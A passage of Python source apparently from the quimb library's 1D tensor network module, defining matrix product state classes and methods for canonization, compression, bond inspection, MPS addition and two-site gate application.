TensorNetwork):
"""1D Tensor network which overall is like a vector with a single type of
site ind.
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_site_ind_id',
'_L',
)
def reindex_all(self, new_id, inplace=False):
"""Reindex all physical sites and change the ``site_ind_id``.
"""
tn = self if inplace else self.copy()
tn.site_ind_id = new_id
return tn
reindex_all_ = functools.partialmethod(reindex_all, inplace=True)
def reindex_sites(self, new_id, where=None, inplace=False):
"""Update the physical site index labels to a new string specifier.
Note that this doesn't change the stored id string with the TN.
Parameters
----------
new_id : str
A string with a format placeholder to accept an int, e.g. "ket{}".
where : None or slice
Which sites to update the index labels on. If ``None`` (default)
all sites.
inplace : bool
Whether to reindex in place.
"""
if where is None:
indices = self.gen_site_coos()
elif isinstance(where, slice):
indices = self.slice2sites(where)
else:
indices = where
return self.reindex({self.site_ind(i): new_id.format(i)
for i in indices}, inplace=inplace)
reindex_sites_ = functools.partialmethod(reindex_sites, inplace=True)
def _get_site_ind_id(self):
return self._site_ind_id
def _set_site_ind_id(self, new_id):
if self._site_ind_id != new_id:
self.reindex_sites_(new_id)
self._site_ind_id = new_id
site_ind_id = property(_get_site_ind_id, _set_site_ind_id,
doc="The string specifier for the physical indices")
def site_ind(self, i):
"""Get the physical index name of site ``i``.
"""
if not isinstance(i, str):
i = i % self.L
return self.site_ind_id.format(i)
@property
def site_inds(self):
"""An ordered tuple of the actual physical indices.
"""
return tuple(map(self.site_ind, self.gen_site_coos()))
def to_dense(self, *inds_seq, **contract_opts):
"""Return the dense ket version of this 1D vector, i.e. a
``qarray`` with shape (-1, 1).
"""
if not inds_seq:
# just use list of site indices
return do('reshape', TensorNetwork.to_dense(
self, self.site_inds, **contract_opts
), (-1, 1))
return TensorNetwork.to_dense(self, *inds_seq, **contract_opts)
def phys_dim(self, i=None):
if i is None:
i = next(iter(self.gen_site_coos()))
return self.ind_size(self.site_ind(i))
@functools.wraps(gate_TN_1D)
def gate(self, *args, inplace=False, **kwargs):
return gate_TN_1D(self, *args, inplace=inplace, **kwargs)
gate_ = functools.partialmethod(gate, inplace=True)
@functools.wraps(expec_TN_1D)
def expec(self, *args, **kwargs):
return expec_TN_1D(self, *args, **kwargs)
def correlation(self, A, i, j, B=None, **expec_opts):
"""Correlation of operator ``A`` between ``i`` and ``j``.
Parameters
----------
A : array
The operator to act with, can be multi site.
i : int or sequence of int
The first site(s).
j : int or sequence of int
The second site(s).
expec_opts
Supplied to :func:`~quimb.tensor.tensor_1d.expec_TN_1D`.
Returns
-------
C : float
The correlation ``<A(i)> + <A(j)> - <A(ij)>``.
Examples
--------
>>> ghz = (MPS_computational_state('0000') +
... MPS_computational_state('1111')) / 2**0.5
>>> ghz.correlation(pauli('Z'), 0, 1)
1.0
>>> ghz.correlation(pauli('Z'), 0, 1, B=pauli('X'))
0.0
"""
if B is None:
B = A
bra = self.H
pA = self.gate(A, i, contract=True)
cA = expec_TN_1D(bra, pA, **expec_opts)
pB = self.gate(B, j, contract=True)
cB = expec_TN_1D(bra, pB, **expec_opts)
pAB = pA.gate_(B, j, contract=True)
cAB = expec_TN_1D(bra, pAB, **expec_opts)
return cAB - cA * cB
class TensorNetwork1DOperator(TensorNetwork1D,
TensorNetwork):
_EXTRA_PROPS = (
'_site_tag_id',
'_upper_ind_id',
'_lower_ind_id',
'_L',
)
def reindex_lower_sites(self, new_id, where=None, inplace=False):
"""Update the lower site index labels to a new string specifier.
Parameters
----------
new_id : str
A string with a format placeholder to accept an int, e.g.
``"ket{}"``.
where : None or slice
Which sites to update the index labels on. If ``None`` (default)
all sites.
inplace : bool
Whether to reindex in place.
"""
if where is None:
start = 0
stop = self.L
else:
start = 0 if where.start is None else where.start
stop = self.L if where.stop is ... else where.stop
return self.reindex({self.lower_ind(i): new_id.format(i)
for i in range(start, stop)}, inplace=inplace)
reindex_lower_sites_ = functools.partialmethod(
reindex_lower_sites, inplace=True)
def reindex_upper_sites(self, new_id, where=None, inplace=False):
"""Update the upper site index labels to a new string specifier.
Parameters
----------
new_id : str
A string with a format placeholder to accept an int, e.g. "ket{}".
where : None or slice
Which sites to update the index labels on. If ``None`` (default)
all sites.
inplace : bool
Whether to reindex in place.
"""
if where is None:
start = 0
stop = self.L
else:
start = 0 if where.start is None else where.start
stop = self.L if where.stop is ... else where.stop
return self.reindex({self.upper_ind(i): new_id.format(i)
for i in range(start, stop)}, inplace=inplace)
reindex_upper_sites_ = functools.partialmethod(
reindex_upper_sites, inplace=True)
def _get_lower_ind_id(self):
return self._lower_ind_id
def _set_lower_ind_id(self, new_id):
if new_id == self._upper_ind_id:
raise ValueError("Setting the same upper and lower index ids will"
" make the two ambiguous.")
if self._lower_ind_id != new_id:
self.reindex_lower_sites_(new_id)
self._lower_ind_id = new_id
lower_ind_id = property(
_get_lower_ind_id, _set_lower_ind_id,
doc="The string specifier for the lower phyiscal indices")
def lower_ind(self, i):
"""The name of the lower ('ket') index at site ``i``.
"""
return self.lower_ind_id.format(i)
@property
def lower_inds(self):
"""An ordered tuple of the actual lower physical indices.
"""
return tuple(map(self.lower_ind, self.gen_site_coos()))
def _get_upper_ind_id(self):
return self._upper_ind_id
def _set_upper_ind_id(self, new_id):
if new_id == self._lower_ind_id:
raise ValueError("Setting the same upper and lower index ids will"
" make the two ambiguous.")
if self._upper_ind_id != new_id:
self.reindex_upper_sites_(new_id)
self._upper_ind_id = new_id
upper_ind_id = property(_get_upper_ind_id, _set_upper_ind_id,
doc="The string specifier for the upper phyiscal "
"indices")
def upper_ind(self, i):
"""The name of the upper ('bra') index at site ``i``.
"""
return self.upper_ind_id.format(i)
@property
def upper_inds(self):
"""An ordered tuple of the actual upper physical indices.
"""
return tuple(map(self.upper_ind, self.gen_site_coos()))
def to_dense(self, *inds_seq, **contract_opts):
"""Return the dense matrix version of this 1D operator, i.e. a
``qarray`` with shape (d, d).
"""
if not inds_seq:
inds_seq = (self.upper_inds, self.lower_inds)
return TensorNetwork.to_dense(self, *inds_seq, **contract_opts)
def phys_dim(self, i=None, which='upper'):
"""Get a physical index size of this 1D operator.
"""
if i is None:
i = next(iter(self.gen_site_coos()))
if which == 'upper':
return self[i].ind_size(self.upper_ind(i))
if which == 'lower':
return self[i].ind_size(self.lower_ind(i))
def set_default_compress_mode(opts, cyclic=False):
opts.setdefault('cutoff_mode', 'rel' if cyclic else 'rsum2')
class TensorNetwork1DFlat(TensorNetwork1D,
TensorNetwork):
"""1D Tensor network which has a flat structure.
"""
_EXTRA_PROPS = ('_site_tag_id', '_L')
def _left_decomp_site(self, i, bra=None, **split_opts):
T1, T2 = self[i], self[i + 1]
rix, lix = T1.filter_bonds(T2)
set_default_compress_mode(split_opts, self.cyclic)
Q, R = T1.split(lix, get='tensors', right_inds=rix, **split_opts)
R = R @ T2
Q.transpose_like_(T1)
R.transpose_like_(T2)
self[i].modify(data=Q.data)
self[i + 1].modify(data=R.data)
if bra is not None:
bra[i].modify(data=Q.data.conj())
bra[i + 1].modify(data=R.data.conj())
def _right_decomp_site(self, i, bra=None, **split_opts):
T1, T2 = self[i], self[i - 1]
lix, rix = T1.filter_bonds(T2)
set_default_compress_mode(split_opts, self.cyclic)
L, Q = T1.split(lix, get='tensors', right_inds=rix, **split_opts)
L = T2 @ L
L.transpose_like_(T2)
Q.transpose_like_(T1)
self[i - 1].modify(data=L.data)
self[i].modify(data=Q.data)
if bra is not None:
bra[i - 1].modify(data=L.data.conj())
bra[i].modify(data=Q.data.conj())
def left_canonize_site(self, i, bra=None):
r"""Left canonize this TN's ith site, inplace::
i i
-o-o- ->-s-
... | | ... ==> ... | | ...
Parameters
----------
i : int
Which site to canonize. The site at i + 1 also absorbs the
non-isometric part of the decomposition of site i.
bra : None or matching TensorNetwork to self, optional
If set, also update this TN's data with the conjugate canonization.
"""
self._left_decomp_site(i, bra=bra, method='qr')
def right_canonize_site(self, i, bra=None):
r"""Right canonize this TN's ith site, inplace::
i i
-o-o- -s-<-
... | | ... ==> ... | | ...
Parameters
----------
i : int
Which site to canonize. The site at i - 1 also absorbs the
non-isometric part of the decomposition of site i.
bra : None or matching TensorNetwork to self, optional
If set, also update this TN's data with the conjugate canonization.
"""
self._right_decomp_site(i, bra=bra, method='lq')
def left_canonize(self, stop=None, start=None, normalize=False, bra=None):
r"""Left canonize all or a portion of this TN. If this is a MPS,
this implies that::
i i
>->->->->->->-o-o- +-o-o-
| | | | | | | | | ... => | | | ...
>->->->->->->-o-o- +-o-o-
Parameters
----------
start : int, optional
If given, the site to start left canonizing at.
stop : int, optional
If given, the site to stop left canonizing at.
normalize : bool, optional
Whether to normalize the state, only works for OBC.
bra : MatrixProductState, optional
If supplied, simultaneously left canonize this MPS too, assuming it
to be the conjugate state.
"""
if start is None:
start = -1 if self.cyclic else 0
if stop is None:
stop = self.L - 1
for i in range(start, stop):
self.left_canonize_site(i, bra=bra)
if normalize:
factor = self[-1].norm()
self[-1] /= factor
if bra is not None:
bra[-1] /= factor
def right_canonize(self, stop=None, start=None, normalize=False, bra=None):
r"""Right canonize all or a portion of this TN. If this is a MPS,
this implies that::
i i
-o-o-<-<-<-<-<-<-< -o-o-+
... | | | | | | | | | -> ... | | |
-o-o-<-<-<-<-<-<-< -o-o-+
Parameters
----------
start : int, optional
If given, the site to start right canonizing at.
stop : int, optional
If given, the site to stop right canonizing at.
normalize : bool, optional
Whether to normalize the state.
bra : MatrixProductState, optional
If supplied, simultaneously right canonize this MPS too, assuming
it to be the conjugate state.
"""
if start is None:
start = self.L - (0 if self.cyclic else 1)
if stop is None:
stop = 0
for i in range(start, stop, -1):
self.right_canonize_site(i, bra=bra)
if normalize:
factor = self[0].norm()
self[0] /= factor
if bra is not None:
bra[0] /= factor
def canonize_cyclic(self, i, bra=None, method='isvd', inv_tol=1e-10):
"""Bring this MatrixProductState into (possibly only approximate)
canonical form at site(s) ``i``.
Parameters
----------
i : int or slice
The site or range of sites to make canonical.
bra : MatrixProductState, optional
Simultaneously canonize this state as well, assuming it to be the
co-vector.
method : {'isvd', 'svds', ...}, optional
How to perform the lateral compression.
inv_tol : float, optional
Tolerance with which to invert the gauge.
"""
if isinstance(i, Integral):
start, stop = i, i + 1
elif isinstance(i, slice):
start, stop = i.start, i.stop
else:
start, stop = min(i), max(i) + 1
if tuple(i) != tuple(range(start, stop)):
raise ValueError("Parameter ``i`` should be an integer or "
f"contiguous block of integers, got {i}.")
k = self.copy()
b = k.H
k.add_tag('_KET')
b.add_tag('_BRA')
kb = k & b
# approximate the rest of the chain with a separable transfer operator
kbc = kb.replace_section_with_svd(start, stop, eps=0.0, which='!any',
method=method, max_bond=1,
ltags='_LEFT', rtags='_RIGHT')
EL = kbc['_LEFT'].squeeze()
# explicitly symmetrize to hermitian
EL.modify(data=(EL.data + dag(EL.data)) / 2)
# split into upper 'ket' part and lower 'bra' part, symmetric
EL_lix, = EL.bonds(kbc[k.site_tag(start), '_BRA'])
_, x = EL.split(EL_lix, method='eigh', cutoff=-1, get='arrays')
ER = kbc['_RIGHT'].squeeze()
# explicitly symmetrize to hermitian
ER.modify(data=(ER.data + dag(ER.data)) / 2)
# split into upper 'ket' part and lower 'bra' part, symmetric
ER_lix, = ER.bonds(kbc[k.site_tag(stop - 1), '_BRA'])
_, y = ER.split(ER_lix, method='eigh', cutoff=-1, get='arrays')
self.insert_gauge(x, start - 1, start, tol=inv_tol)
self.insert_gauge(y, stop, stop - 1, tol=inv_tol)
if bra is not None:
for i in (start - 1, start, stop, stop - 1):
bra[i].modify(data=self[i].data.conj())
def shift_orthogonality_center(self, current, new, bra=None):
"""Move the orthogonality center of this MPS.
Parameters
----------
current : int
The current orthogonality center.
new : int
The target orthogonality center.
bra : MatrixProductState, optional
If supplied, simultaneously move the orthogonality center of this
MPS too, assuming it to be the conjugate state.
"""
if new > current:
for i in range(current, new):
self.left_canonize_site(i, bra=bra)
else:
for i in range(current, new, -1):
self.right_canonize_site(i, bra=bra)
def canonize(self, where, cur_orthog='calc', bra=None):
r"""Mixed canonize this TN. If this is a MPS, this implies that::
i i
>->->->->- ->-o-<- -<-<-<-<-< +-o-+
| | | | |...| | |...| | | | | -> | | |
>->->->->- ->-o-<- -<-<-<-<-< +-o-+
You can also supply a set of indices to orthogonalize around, and a
current location of the orthogonality center for efficiency::
current where
....... .....
>->->-c-c-c-c-<-<-<-<-<-< >->->->->->-w-w-w-<-<-<-<
| | | | | | | | | | | | | -> | | | | | | | | | | | | |
>->->-c-c-c-c-<-<-<-<-<-< >->->->->->-w-w-w-<-<-<-<
cmin cmax i j
This would only move ``cmin`` to ``i`` and ``cmax`` to ``j`` if
necessary.
Parameters
----------
where : int or sequence of int
Which site(s) to orthogonalize around. If a sequence of int then
make sure that section from min(where) to max(where) is orthog.
cur_orthog : int, sequence of int, or 'calc'
If given, the current site(s), so as to shift the orthogonality
ceneter as efficiently as possible. If 'calc', calculate the
current orthogonality center.
bra : MatrixProductState, optional
If supplied, simultaneously mixed canonize this MPS too, assuming
it to be the conjugate state.
"""
if isinstance(where, int):
i = j = where
else:
i, j = min(where), max(where)
if cur_orthog == 'calc':
cur_orthog = self.calc_current_orthog_center()
if cur_orthog is not None:
if isinstance(cur_orthog, int):
cmin = cmax = cur_orthog
else:
cmin, cmax = min(cur_orthog), max(cur_orthog)
if cmax > j:
self.shift_orthogonality_center(cmax, j, bra=bra)
if cmin < i:
self.shift_orthogonality_center(cmin, i, bra=bra)
else:
self.left_canonize(i, bra=bra)
self.right_canonize(j, bra=bra)
return self
def left_compress_site(self, i, bra=None, **compress_opts):
"""Left compress this 1D TN's ith site, such that the site is then
left unitary with its right bond (possibly) reduced in dimension.
Parameters
----------
i : int
Which site to compress.
bra : None or matching TensorNetwork to self, optional
If set, also update this TN's data with the conjugate compression.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
compress_opts.setdefault('absorb', 'right')
self._left_decomp_site(i, bra=bra, **compress_opts)
def right_compress_site(self, i, bra=None, **compress_opts):
"""Right compress this 1D TN's ith site, such that the site is then
right unitary with its left bond (possibly) reduced in dimension.
Parameters
----------
i : int
Which site to compress.
bra : None or matching TensorNetwork to self, optional
If set, update this TN's data with the conjugate compression.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
compress_opts.setdefault('absorb', 'left')
self._right_decomp_site(i, bra=bra, **compress_opts)
def left_compress(self, start=None, stop=None, bra=None, **compress_opts):
"""Compress this 1D TN, from left to right, such that it becomes
left-canonical (unless ``absorb != 'right'``).
Parameters
----------
start : int, optional
Site to begin compressing on.
stop : int, optional
Site to stop compressing at (won't itself be an isometry).
bra : None or TensorNetwork like this one, optional
If given, update this TN as well, assuming it to be the conjugate.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
if start is None:
start = -1 if self.cyclic else 0
if stop is None:
stop = self.L - 1
for i in range(start, stop):
self.left_compress_site(i, bra=bra, **compress_opts)
def right_compress(self, start=None, stop=None, bra=None, **compress_opts):
"""Compress this 1D TN, from right to left, such that it becomes
right-canonical (unless ``absorb != 'left'``).
Parameters
----------
start : int, optional
Site to begin compressing on.
stop : int, optional
Site to stop compressing at (won't itself be an isometry).
bra : None or TensorNetwork like this one, optional
If given, update this TN as well, assuming it to be the conjugate.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
if start is None:
start = self.L - (0 if self.cyclic else 1)
if stop is None:
stop = 0
for i in range(start, stop, -1):
self.right_compress_site(i, bra=bra, **compress_opts)
def compress(self, form=None, **compress_opts):
"""Compress this 1D Tensor Network, possibly into canonical form.
Parameters
----------
form : {None, 'flat', 'left', 'right'} or int
Output form of the TN. ``None`` left canonizes the state first for
stability reasons, then right_compresses (default). ``'flat'``
tries to distribute the singular values evenly -- state will not
be canonical. ``'left'`` and ``'right'`` put the state into left
and right canonical form respectively with a prior opposite sweep,
or an int will put the state into mixed canonical form at that
site.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
if form is None:
form = 'right'
if isinstance(form, Integral):
self.right_canonize()
self.left_compress(**compress_opts)
self.right_canonize(stop=form)
elif form == 'left':
self.right_canonize(bra=compress_opts.get('bra', None))
self.left_compress(**compress_opts)
elif form == 'right':
self.left_canonize(bra=compress_opts.get('bra', None))
self.right_compress(**compress_opts)
elif form == 'flat':
compress_opts['absorb'] = 'both'
self.right_compress(stop=self.L // 2, **compress_opts)
self.left_compress(stop=self.L // 2, **compress_opts)
else:
raise ValueError(f"Form specifier {form} not understood, should be"
" either 'left', 'right', 'flat' or an int "
"specifiying a new orthog center.")
def compress_site(self, i, canonize=True, cur_orthog='calc', bra=None,
**compress_opts):
r"""Compress the bonds adjacent to site ``i``, by default first setting
the orthogonality center to that site::
i i
-o-o-o-o-o- --> ->->~o~<-<-
| | | | | | | | | |
Parameters
----------
i : int
Which site to compress around
canonize : bool, optional
Whether to first set the orthogonality center to site ``i``.
cur_orthog : int, optional
If given, the known current orthogonality center, to speed up the
mixed canonization.
bra : MatrixProductState, optional
The conjugate state to also apply the compression to.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
"""
if canonize:
self.canonize(i, cur_orthog=cur_orthog, bra=bra)
if self.cyclic or i > 0:
self.left_compress_site(i - 1, bra=bra, **compress_opts)
if self.cyclic or i < self.L - 1:
self.right_compress_site(i + 1, bra=bra, **compress_opts)
def bond(self, i, j):
"""Get the name of the index defining the bond between sites i and j.
"""
bond, = self[i].bonds(self[j])
return bond
def bond_size(self, i, j):
"""Return the size of the bond between site ``i`` and ``j``.
"""
b_ix = self.bond(i, j)
return self[i].ind_size(b_ix)
def bond_sizes(self):
bnd_szs = [self.bond_size(i, i + 1) for i in range(self.L - 1)]
if self.cyclic:
bnd_szs.append(self.bond_size(-1, 0))
return bnd_szs
def singular_values(self, i, cur_orthog=None, method='svd'):
r"""Find the singular values associated with the ith bond::
....L.... i
o-o-o-o-o-l-o-o-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | |
i-1 ..........R..........
Leaves the 1D TN in mixed canoncial form at bond ``i``.
Parameters
----------
i : int
Which bond, or equivalently, the number of sites in the
left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization, e.g. if sweeping this function from left to
right would use ``i - 1``.
Returns
-------
svals : 1d-array
The singular values.
"""
if not (0 < i < self.L):
raise ValueError(f"Need 0 < i < {self.L}, got i={i}.")
self.canonize(i, cur_orthog)
Tm1 = self[i]
left_inds = Tm1.bonds(self[i - 1])
return Tm1.singular_values(left_inds, method=method)
def expand_bond_dimension(
self,
new_bond_dim,
rand_strength=0.0,
bra=None,
inplace=True,
):
"""Expand the bond dimensions of this 1D tensor network to at least
``new_bond_dim``.
Parameters
----------
new_bond_dim : int
Minimum bond dimension to expand to.
inplace : bool, optional
Whether to perform the expansion in place.
bra : MatrixProductState, optional
Mirror the changes to ``bra`` inplace, treating it as the conjugate
state.
rand_strength : float, optional
If ``rand_strength > 0``, fill the new tensor entries with gaussian
noise of strength ``rand_strength``.
Returns
-------
MatrixProductState
"""
tn = super().expand_bond_dimension(
new_bond_dim=new_bond_dim,
rand_strength=rand_strength,
inplace=inplace,
)
if bra is not None:
for coo in tn.gen_site_coos():
bra[coo].modify(data=tn[coo].data.conj())
return tn
def count_canonized(self):
if self.cyclic:
return 0, 0
ov = self.H & self
num_can_l = 0
num_can_r = 0
def isidentity(x):
d = x.shape[0]
if get_dtype_name(x) in ('float32', 'complex64'):
rtol, atol = 1e-5, 1e-6
else:
rtol, atol = 1e-9, 1e-11
idtty = do('eye', d, dtype=x.dtype, like=x)
return do('allclose', x, idtty, rtol=rtol, atol=atol)
for i in range(self.L - 1):
ov ^= slice(max(0, i - 1), i + 1)
x = ov[i].data
if isidentity(x):
num_can_l += 1
else:
break
for j in reversed(range(i + 1, self.L)):
ov ^= slice(j, min(self.L, j + 2))
x = ov[j].data
if isidentity(x):
num_can_r += 1
else:
break
return num_can_l, num_can_r
def calc_current_orthog_center(self):
"""Calculate the site(s) of the current orthogonality center.
Returns
-------
int or (int, int)
The site, or min/max, around which this MPS is orthogonal.
"""
lo, ro = self.count_canonized()
i, j = lo, self.L - ro - 1
return i if i == j else i, j
def as_cyclic(self, inplace=False):
"""Convert this flat, 1D, TN into cyclic form by adding a dummy bond
between the first and last sites.
"""
tn = self if inplace else self.copy()
# nothing to do
if tn.cyclic:
return tn
tn.new_bond(0, -1)
tn.cyclic = True
return tn
def show(self, max_width=None):
l1 = ""
l2 = ""
l3 = ""
num_can_l, num_can_r = self.count_canonized()
for i in range(self.L - 1):
bdim = self.bond_size(i, i + 1)
strl = len(str(bdim))
l1 += f" {bdim}"
l2 += (">" if i < num_can_l else
"<" if i >= self.L - num_can_r else
"●") + ("─" if bdim < 100 else "━") * strl
l3 += "│" + " " * strl
strl = len(str(bdim))
l1 += " "
l2 += "<" if num_can_r > 0 else "●"
l3 += "│"
if self.cyclic:
bdim = self.bond_size(0, self.L - 1)
bnd_str = ("─" if bdim < 100 else "━") * strl
l1 = f" {bdim}{l1}{bdim} "
l2 = f"+{bnd_str}{l2}{bnd_str}+"
l3 = f" {' ' * strl}{l3}{' ' * strl} "
print_multi_line(l1, l2, l3, max_width=max_width)
class MatrixProductState(TensorNetwork1DVector,
TensorNetwork1DFlat,
TensorNetwork1D,
TensorNetwork):
"""Initialise a matrix product state, with auto labelling and tagging.
Parameters
----------
arrays : sequence of arrays
The tensor arrays to form into a MPS.
shape : str, optional
String specifying layout of the tensors. E.g. 'lrp' (the default)
indicates the shape corresponds left-bond, right-bond, physical index.
End tensors have either 'l' or 'r' dropped from the string.
site_ind_id : str
A string specifiying how to label the physical site indices. Should
contain a ``'{}'`` placeholder. It is used to generate the actual
indices like: ``map(site_ind_id.format, range(len(arrays)))``.
site_tag_id : str
A string specifiying how to tag the tensors at each site. Should
contain a ``'{}'`` placeholder. It is used to generate the actual tags
like: ``map(site_tag_id.format, range(len(arrays)))``.
tags : str or sequence of str, optional
Global tags to attach to all tensors.
bond_name : str, optional
The base name of the bond indices, onto which uuids will be added.
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_site_ind_id',
'cyclic',
'_L',
)
def __init__(self, arrays, *, shape='lrp', tags=None, bond_name="",
site_ind_id='k{}', site_tag_id='I{}', **tn_opts):
# short-circuit for copying MPSs
if isinstance(arrays, MatrixProductState):
super().__init__(arrays)
return
arrays = tuple(arrays)
self._L = len(arrays)
# process site indices
self._site_ind_id = site_ind_id
site_inds = map(site_ind_id.format, range(self.L))
# process site tags
self._site_tag_id = site_tag_id
site_tags = map(site_tag_id.format, range(self.L))
if tags is not None:
# mix in global tags
tags = tags_to_oset(tags)
site_tags = (tags | oset((st,)) for st in site_tags)
self.cyclic = (ops.ndim(arrays[0]) == 3)
# transpose arrays to 'lrp' order.
def gen_orders():
lp_ord = tuple(shape.replace('r', "").find(x) for x in 'lp')
lrp_ord = tuple(shape.find(x) for x in 'lrp')
rp_ord = tuple(shape.replace('l', "").find(x) for x in 'rp')
yield lp_ord if not self.cyclic else lrp_ord
for _ in range(self.L - 2):
yield lrp_ord
yield rp_ord if not self.cyclic else lrp_ord
def gen_inds():
cyc_bond = (rand_uuid(base=bond_name),) if self.cyclic else ()
nbond = rand_uuid(base=bond_name)
yield cyc_bond + (nbond, next(site_inds))
pbond = nbond
for _ in range(self.L - 2):
nbond = rand_uuid(base=bond_name)
yield (pbond, nbond, next(site_inds))
pbond = nbond
yield (pbond,) + cyc_bond + (next(site_inds),)
def gen_tensors():
for array, site_tag, inds, order in zip(arrays, site_tags,
gen_inds(), gen_orders()):
yield Tensor(transpose(array, order), inds=inds, tags=site_tag)
super().__init__(gen_tensors(), virtual=True, **tn_opts)
@classmethod
def from_dense(cls, psi, dims, site_ind_id='k{}',
site_tag_id='I{}', **split_opts):
"""Create a ``MatrixProductState`` directly from a dense vector
Parameters
----------
psi : array_like
The dense state to convert to MPS from.
dims : sequence of int
Physical subsystem dimensions of each site.
site_ind_id : str, optional
How to index the physical sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductState`.
site_tag_id : str, optional
How to tag the physical sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductState`.
split_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split` to
in order to partition the dense vector into tensors.
Returns
-------
MatrixProductState
Examples
--------
>>> dims = [2, 2, 2, 2, 2, 2]
>>> psi = rand_ket(prod(dims))
>>> mps = MatrixProductState.from_dense(psi, dims)
>>> mps.show()
2 4 8 4 2
o-o-o-o-o-o
| | | | | |
"""
set_default_compress_mode(split_opts)
L = len(dims)
inds = [site_ind_id.format(i) for i in range(L)]
T = Tensor(reshape(ops.asarray(psi), dims), inds=inds)
def gen_tensors():
# split
# <-- : yield
# : :
# OOOOOOO--O-O-O
# ||||||| | | |
# .......
# left_inds
TM = T
for i in range(L - 1, 0, -1):
TM, TR = TM.split(left_inds=inds[:i], get='tensors',
rtags=site_tag_id.format(i), **split_opts)
yield TR
TM.add_tag(site_tag_id.format(0))
yield TM
tn = TensorNetwork(gen_tensors())
return cls.from_TN(tn, cyclic=False, L=L,
site_ind_id=site_ind_id,
site_tag_id=site_tag_id)
def add_MPS(self, other, inplace=False, compress=False, **compress_opts):
"""Add another MatrixProductState to this one.
"""
if self.L != other.L:
raise ValueError("Can't add MPS with another of different length.")
new_mps = self if inplace else self.copy()
for i in new_mps.gen_site_coos():
t1, t2 = new_mps[i], other[i]
if set(t1.inds) != set(t2.inds):
# Need to use bonds to match indices
reindex_map = {}
if i > 0 or self.cyclic:
pair = ((i - 1) % self.L, i)
reindex_map[other.bond(*pair)] = new_mps.bond(*pair)
if i < new_mps.L - 1 or self.cyclic:
pair = (i, (i + 1) % self.L)
reindex_map[other.bond(*pair)] = new_mps.bond(*pair)
t2 = t2.reindex(reindex_map)
t1.direct_product_(t2, sum_inds=new_mps.site_ind(i))
if compress:
new_mps.compress(**compress_opts)
return new_mps
add_MPS_ = functools.partialmethod(add_MPS, inplace=True)
def permute_arrays(self, shape='lrp'):
"""Permute the indices of each tensor in this MPS to match ``shape``.
This doesn't change how the overall object interacts with other tensor
networks but may be useful for extracting the underlying arrays
consistently. This is an inplace operation.
Parameters
----------
shape : str, optional
A permutation of ``'lrp'`` specifying the desired order of the
left, right, and physical indices respectively.
"""
for i in self.sites:
inds = {'p': self.site_ind(i)}
if self.cyclic or i > 0:
inds['l'] = self.bond(i, (i - 1) % self.L)
if self.cyclic or i < self.L - 1:
inds['r'] = self.bond(i, (i + 1) % self.L)
inds = [inds[s] for s in shape if s in inds]
self[i].transpose_(*inds)
def __add__(self, other):
"""MPS addition.
"""
return self.add_MPS(other, inplace=False)
def __iadd__(self, other):
"""In-place MPS addition.
"""
return self.add_MPS(other, inplace=True)
def __sub__(self, other):
"""MPS subtraction.
"""
return self.add_MPS(other * -1, inplace=False)
def __isub__(self, other):
"""In-place MPS subtraction.
"""
return self.add_MPS(other * -1, inplace=True)
def normalize(self, bra=None, eps=1e-15, insert=None):
"""Normalize this MPS, optional with co-vector ``bra``. For periodic
MPS this uses transfer matrix SVD approximation with precision ``eps``
in order to be efficient. Inplace.
Parameters
----------
bra : MatrixProductState, optional
If given, normalize this MPS with the same factor.
eps : float, optional
If cyclic, precision to approximation transfer matrix with.
Default: 1e-14.
insert : int, optional
Insert the corrective normalization on this site, random if
not given.
Returns
-------
old_norm : float
The old norm ``self.H @ self``.
"""
norm = expec_TN_1D(self.H, self, eps=eps)
if insert is None:
insert = -1
self[insert].modify(data=self[insert].data / norm ** 0.5)
if bra is not None:
bra[insert].modify(data=bra[insert].data / norm ** 0.5)
return norm
def gate_split(self, G, where, inplace=False, **compress_opts):
r"""Apply a two-site gate and then split resulting tensor to retrieve a
MPS form::
-o-o-A-B-o-o-
| | | | | | -o-o-GGG-o-o- -o-o-X~Y-o-o-
| | GGG | | ==> | | | | | | ==> | | | | | |
| | | | | | i j i j
i j
As might be found in TEBD.
Parameters
----------
G : array
The gate, with shape ``(d**2, d**2)`` for physical dimension ``d``.
where : (int, int)
Indices of the sites to apply the gate to.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_split`.
See Also
--------
gate, gate_with_auto_swap
"""
tn = self if inplace else self.copy()
i, j = where
Ti, Tj = tn[i], tn[j]
ix_i, ix_j = tn.site_ind(i), tn.site_ind(j)
# Make Tensor of gate
d = tn.phys_dim(i)
TG = Tensor(reshape(ops.asarray(G), (d, d, d, d)),
inds=("_tmpi", "_tmpj", ix_i, ix_j))
# Contract gate into the two sites
TG = TG.contract(Ti, Tj)
TG.reindex_({"_tmpi": ix_i, "_tmpj": ix_j})
# Split the tensor
_, left_ix = Ti.filter_bonds(Tj)
set_default_compress_mode(compress_opts, self.cyclic)
nTi, nTj = TG.split(left_inds=left_ix, get='tensors', **compress_opts)
# make sure the new data shape matches and reinsert
Ti.modify(data=nTi.transpose_like_(Ti).data)
Tj.modify(data=nTj.transpose_like_(Tj).data)
return tn
gate_split_ = functools.partialmethod(gate_split, inplace=True)
def swap_sites_with_compress(self, i, j, cur_orthog=None,
inplace=False, **compress_opts):
"""Swap sites ``i`` and ``j`` by contracting, then splitting with the
physical indices swapped.
Parameters
----------
i : int
The first site to swap.
j : int
The second site to swap.
cur_orthog : int, sequence of int, or 'calc'
If known, the current orthogonality center.
inplace : bond, optional
Perform the swaps inplace.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
"""
i, j = sorted((i, j))
if i + 1 != j:
raise ValueError("Sites aren't adjacent.")
mps = self if inplace else self.copy()
mps.canonize((i, j), cur_orthog)
# get site tensors and indices
ix_i, ix_j = map(mps.site_ind, (i, j))
Ti, Tj = mps[i], mps[j]
_, unshared = Ti.filter_bonds(Tj)
# split the contracted tensor, swapping the site indices
Tij = Ti @ Tj
lix = [i for i in unshared if i != ix_i] + [ix_j]
